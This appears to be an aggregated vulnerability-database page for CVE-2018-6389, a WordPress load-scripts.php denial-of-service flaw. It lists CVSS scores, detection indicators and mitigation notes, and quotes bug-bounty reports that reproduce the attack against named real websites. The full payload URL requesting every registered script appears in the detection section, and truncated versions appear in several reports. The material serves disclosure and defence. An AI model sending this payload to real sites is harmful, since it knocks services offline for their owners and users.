CVE-2018-6389
published 2018-02-06CVE-2018-6389: In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files…
PriorityP267high7.5CVSS 3.0
AVNACLPRNUINSUCNINAH
EXPLOIT
EPSS
73.10%
99.4th percentile
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | — | — |
| wordpress | wordpress | <= 4.9.2 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9↗
- →Detect exploitation attempts by matching HTTP GET requests to /wp-admin/load-scripts.php with an excessively long query string (>=1000 chars), indicative of the full JS bundle DoS payload. ↗
- →A single exploit request causes the server to perform 181 I/O actions and return ~4MB of data; monitor for anomalously large responses from /wp-admin/load-scripts.php as a detection signal. ↗
- →The exploit rotates through a known set of User-Agent strings; correlating these UAs with high-volume requests to load-scripts.php can aid detection. ↗
- →Requests include Cache-Control: no-cache header to bypass caching and force server-side I/O on every request; use this as an additional filter alongside load-scripts.php targeting. ↗
- ·The vulnerability has never been acknowledged by WordPress authors and there is no mitigation in the WordPress codebase itself; hardening must be applied at the web server or WAF layer. ↗
- ·Caching the load-scripts.php response at the hosting/CDN layer effectively neutralises the attack by eliminating repeated server-side I/O. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv7.5HIGH
vendor_debian7.5LOW
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-pxcx-cprx-mr28: In WordPress through 4
ghsa_unreviewed·2022-05-14
CVE-2018-6389 [HIGH] CWE-400 GHSA-pxcx-cprx-mr28: In WordPress through 4
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
OSV
CVE-2018-6389: In WordPress through 4
osv·2018-02-06·CVSS 7.5
CVE-2018-6389 [HIGH] CVE-2018-6389: In WordPress through 4
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Debian
CVE-2018-6389: wordpress - In WordPress through 4.9.2, unauthenticated attackers can cause a denial of serv...
vendor_debian·2018·CVSS 7.5
CVE-2018-6389 [HIGH] CVE-2018-6389: wordpress - In WordPress through 4.9.2, unauthenticated attackers can cause a denial of serv...
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2024-02-13·CVSS 7.5
CVE-2018-6389 [HIGH] CVE-2018-6389 exploitation - using scripts loader
CVE-2018-6389 exploitation - using scripts loader
Hi Team !
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as CVE-2018-6389.
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.
References
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
https://hackerone.com/reports/925425
https://hackerone.c
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2023-04-20·CVSS 7.5
CVE-2018-6389 [HIGH] CVE-2018-6389 exploitation - using scripts loader
CVE-2018-6389 exploitation - using scripts loader
Hi Fastly Team !
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as CVE-2018-6389.
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.
**References**
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
https://hackerone.com/reports/925425
https://
HackerOne
DoS at █████(CVE-2018-6389)
hackerone·2023-03-24·CVSS 7.5
CVE-2018-6389 [HIGH] DoS at █████(CVE-2018-6389)
DoS at █████(CVE-2018-6389)
**Description:**
Unauthenticated attackers can cause a denial of service (resource consumption) listing a large number of registered .js files (from wp-includes/script-loader.php)
Vulnerable Url : https://██████████/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-e
HackerOne
DoS at ████████ (CVE-2018-6389)
hackerone·2023-02-24·CVSS 7.5
CVE-2018-6389 [HIGH] DoS at ████████ (CVE-2018-6389)
DoS at ████████ (CVE-2018-6389)
Hi DoD Team!
##Description
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389).
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.
##Vulnerability
https://███/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,col
HackerOne
DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
hackerone·2022-10-13·CVSS 7.5
CVE-2018-6389 [HIGH] DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
The researcher successfully exploited CVE-2018-6389 on https://research.adobe.com/. We appreciate the collaboration and the responsible disclosure.
HackerOne
[mtn.com.af] Multiple vulnerabilities allow to Application level DoS
hackerone·2021-09-28·CVSS 7.5
CVE-2018-6389 [HIGH] [mtn.com.af] Multiple vulnerabilities allow to Application level DoS
[mtn.com.af] Multiple vulnerabilities allow to Application level DoS
**Issue Description**
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389] #761722 #752010 #753491 #335177
**CVE ID Risk Score**
[CVE-2018-6389 7.5](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)
Platform(s) Affected: [website]
*.https://www.mtn.com.af/wp-admin/load-scripts.php?load=
###Steps To Reproduce:
* Open Vulnerability url - open directory ``/wp-admin/load-scripts.php?load=``
* Add ``parameter-vulnerable`` in request header
* In request header using GET-Method
* Show url o
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2021-08-18·CVSS 7.5
CVE-2018-6389 [HIGH] CVE-2018-6389 exploitation - using scripts loader
CVE-2018-6389 exploitation - using scripts loader
**Issue Description**
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389] #761722 #752010 #753491 #335177
**CVE ID Risk Score**
[CVE-2018-6389 7.5](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)
Platform(s) Affected: [website]
*.[https://www.mtn.zm/wp-admin/load-scripts.php?load=](https://www.mtn.zm/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scrip
HackerOne
Possibility of DoS attack at https://sifchain.finance// via CVE-2018-6389 exploitation
hackerone·2021-05-07·CVSS 7.5
CVE-2018-6389 [HIGH] Possibility of DoS attack at https://sifchain.finance// via CVE-2018-6389 exploitation
Possibility of DoS attack at https://sifchain.finance// via CVE-2018-6389 exploitation
There is possibility in /wp-admin/load-scripts.php script to generate large (~3Mb) amount of data via simple non-authenticated request to server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary).
URL:
https://sifchain.finance/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbea
Bugzilla
Critical Vulnerability Report " load-scripts.php allows attacker to temporarily down website
bugzilla·2021-01-17
Critical Vulnerability Report " load-scripts.php allows attacker to temporarily down website
Critical Vulnerability Report " load-scripts.php allows attacker to temporarily down website
Created attachment 9197597
aa.jpg
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Steps to reproduce:
Hi Team,
Summary
The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested.
What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.
I wondered what would happen if I sent the server a reques
HackerOne
scripts loader (denial of service) vulnerability
hackerone·2020-03-19·CVSS 7.5
[HIGH] scripts loader (denial of service) vulnerability
scripts loader (denial of service) vulnerability
1) vulnerability description
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. For example, https://wpwebsite.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file.
However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.
(check references for more details about the vulnerability)
2) attack details
*affected link : https://mariadb.org/wp-admin/load-scripts.php
*proof of concept ( description );
the load-scripts.php file
HackerOne
scripts loader DOS vulnerability
hackerone·2020-02-29·CVSS 7.5
[HIGH] scripts loader DOS vulnerability
scripts loader DOS vulnerability
1) vulnerability description
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. For example, https://wpwebsite.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file.
However, the number and size of files are not restricted in the process of loading JS files, attackers can use this function to deplete server resources and launch denial of service attacks.
(check references for more details about the vulnerability)
2) attack details
*affected link : https://www.formassembly.com/wp-admin/load-scripts.php
*proof of concept ( description );
the load-scripts.php file wa
HackerOne
DoS of https://blog.makerdao.com/ via CVE-2018-6389
hackerone·2020-02-18·CVSS 7.5
CVE-2018-6389 [HIGH] DoS of https://blog.makerdao.com/ via CVE-2018-6389
DoS of https://blog.makerdao.com/ via CVE-2018-6389
DoS of https://blog.makerdao.com/ via CVE-2018-6389
HackerOne
DoS of https://blog.yelp.com/ and other WP instances via CVE-2018-6389
hackerone·2020-01-17·CVSS 7.5
CVE-2018-6389 [HIGH] DoS of https://blog.yelp.com/ and other WP instances via CVE-2018-6389
DoS of https://blog.yelp.com/ and other WP instances via CVE-2018-6389
Description:
There is possibility in /wp-admin/load-scripts.php script to generate large (~3Mb) amount of data via simple non-authenticated request to server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details:
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
Affected URL:
https://www.yelpreservations.com/blog/wp-admin/load-scripts.php?load=common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-ef
HackerOne
Dos https://iandunn.name/ via CVE-2018-6389 exploitation
hackerone·2020-01-09·CVSS 7.5
CVE-2018-6389 [HIGH] Dos https://iandunn.name/ via CVE-2018-6389 exploitation
Dos https://iandunn.name/ via CVE-2018-6389 exploitation
Similar to #752010
Detail:-
There is possibility in /wp-admin/load-scripts.php script to generate large (~3Mb) amount of data via simple non-authenticated request to server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary)
vuln url:-
````
https://iandunn.name///wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat
HackerOne
DoS of https://nordvpn.com/ via CVE-2018-6389 exploitation
hackerone·2020-01-08·CVSS 7.5
CVE-2018-6389 [HIGH] DoS of https://nordvpn.com/ via CVE-2018-6389 exploitation
DoS of https://nordvpn.com/ via CVE-2018-6389 exploitation
There is possibility in /wp-admin/load-scripts.php script to generate large (~3Mb) amount of data via simple non-authenticated request to server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary).
Ready for call URL is following
https://nordvpn.com/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-au
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext·2024-07-31
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
Raveen Kanishka Jayalath*
University of Adelaide, Australia
[email protected]
Hussain Ahmad* *Authors contributed equally to this work. Corresponding author.
University of Adelaide, Australia
[email protected]
Diksha Goel
CSIRO's Data61, Australia
[email protected]
3cmMuhammad Shuja Syed
3cmSLB, USA
[email protected]
Faheem Ullah
University of Adelaide, Australia
[email protected]
plain
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
http://www.securityfocus.com/bid/103060http://www.securitytracker.com/id/1040347https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.htmlhttps://github.com/UltimateHackers/Shivahttps://github.com/WazeHell/CVE-2018-6389https://thehackernews.com/2018/02/wordpress-dos-exploit.htmlhttps://wpvulndb.com/vulnerabilities/9021https://www.exploit-db.com/exploits/43968/http://www.securityfocus.com/bid/103060http://www.securitytracker.com/id/1040347https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.htmlhttps://github.com/UltimateHackers/Shivahttps://github.com/WazeHell/CVE-2018-6389https://thehackernews.com/2018/02/wordpress-dos-exploit.htmlhttps://wpvulndb.com/vulnerabilities/9021https://www.exploit-db.com/exploits/43968/
2018-02-06
Published